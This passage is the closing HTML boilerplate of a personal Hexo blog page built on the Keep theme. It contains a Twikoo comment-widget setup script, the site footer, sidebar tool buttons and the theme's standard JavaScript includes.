                src="//cdn.jsdelivr.net/npm/twikoo@1.6.44/dist/twikoo.all.min.js"
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        ></script>
        <script 
                async
                onerror="window.KeepCommentPlugin.loadFailHandle()"
        >
          window.KeepCommentPlugin.initTwikoo = () => {
            if (window?.twikoo) {
              twikoo.init({
                el: '#twikoo-comment',
                envId: 'https://twikoo-api-beige-one.vercel.app/',
                region: '',
                lang: 'zh-CN' || 'zh-CN'
              })
              window.KeepCommentPlugin.hideLoading()
            } else {
              setTimeout(() => {
                window.KeepCommentPlugin.initTwikoo()
              }, 1000)
            }
          }

          if ('false' === 'true') {
            setTimeout(() => {
              window.KeepCommentPlugin.initTwikoo()
            }, 1200)
          } else {
            window.addEventListener('DOMContentLoaded', window.KeepCommentPlugin.initTwikoo)
          }
        </script>
    </div>


        
    </div>





                
            </div>
        </div>

        
    </div>
</div>


                
            </div>
        </div>

        <div class="page-main-content-bottom border-box">
            
<footer class="footer border-box">
    <div class="copyright-info info-item">
    &copy;&nbsp;<span>2020</span>&nbsp;-&nbsp;2025
    
            &nbsp;<i class="fas fa-heart icon-animate"></i>&nbsp;&nbsp;<a href="/">szkangcheng</a>
        
    </div>

    <div class="theme-info info-item">
        由&nbsp;<a target="_blank" href="https://hexo.io">Hexo</a>&nbsp;驱动&nbsp;&&nbsp;主题&nbsp;<a class="keep-version" target="_blank" href="https://github.com/XPoet/hexo-theme-keep">Keep</a>
    </div>

    

    

    
</footer>

        </div>
    </div>

    <!-- post tools -->
    
        <div class="post-tools right-toc">
            <div class="post-tools-container border-box">
    <ul class="post-tools-list border-box">
        <!-- PC encrypt again -->
        

        <!-- PC TOC show toggle -->
        

        <!-- PC go comment -->
        
            <li class="tools-item flex-center go-to-comments">
                <i class="fas fa-comment"></i>
                <span class="post-comments-count"></span>
            </li>
        

        <!-- PC full screen -->
        <li class="tools-item flex-center full-screen">
            <i class="fa-solid fa-expand"></i>
        </li>
    </ul>
</div>

        </div>
    

    <!-- side tools -->
    <div class="side-tools">
        <div class="side-tools-container border-box ">
    <ul class="side-tools-list side-tools-show-handle border-box">
        <li class="tools-item tool-font-adjust-plus flex-center">
            <i class="fas fa-search-plus"></i>
        </li>

        <li class="tools-item tool-font-adjust-minus flex-center">
            <i class="fas fa-search-minus"></i>
        </li>

        <!-- toggle mode -->
        
            <li class="tools-item tool-toggle-theme-mode flex-center">
                <i class="fas fa-moon"></i>
            </li>
        

        <!-- rss -->
        

        <!-- to bottom -->
        <li class="tools-item tool-scroll-to-bottom flex-center">
            <i class="fas fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="exposed-tools-list border-box">
        

        
            <li class="tools-item go-to-comments-tablet flex-center">
                <i class="fas fa-comment"></i>
            </li>
        

        <li class="tools-item tool-toggle-show flex-center">
            <i class="fas fa-cog fa-spin"></i>
        </li>

        <li class="tools-item tool-scroll-to-top flex-center show-arrow">
            <i class="arrow fas fa-arrow-up"></i>
            <span class="percent"></span>
        </li>
    </ul>
</div>

    </div>

    <!-- image mask -->
    <div class="zoom-in-image-mask">
    <img class="zoom-in-image">
</div>


    <!-- local search -->
    

    <!-- tablet toc -->
    
</main>





<!-- common js -->

<script src="/js/utils.js"></script>

<script src="/js/header-shrink.js"></script>

<script src="/js/back2top.js"></script>

<script src="/js/toggle-theme.js"></script>

<script src="/js/code-block.js"></script>

<script src="/js/main.js"></script>

<script src="/js/libs/anime.min.js"></script>


<!-- local search -->


<!-- lazyload -->


<div class="">
    <!-- home page -->
    

    <!-- post page -->
    
        <!-- post-helper -->
        
<script src="/js/post/post-helper.js"></script>


        <!-- toc -->
        

        <!-- copyright-info -->
        

        <!-- share -->
        
    

    <!-- categories page -->
    

    <!-- links page -->
    

    <!-- photos page -->
    

    <!-- tools page -->
    
</div>

<!-- mermaid -->


<!-- pjax -->



</body>
</html>
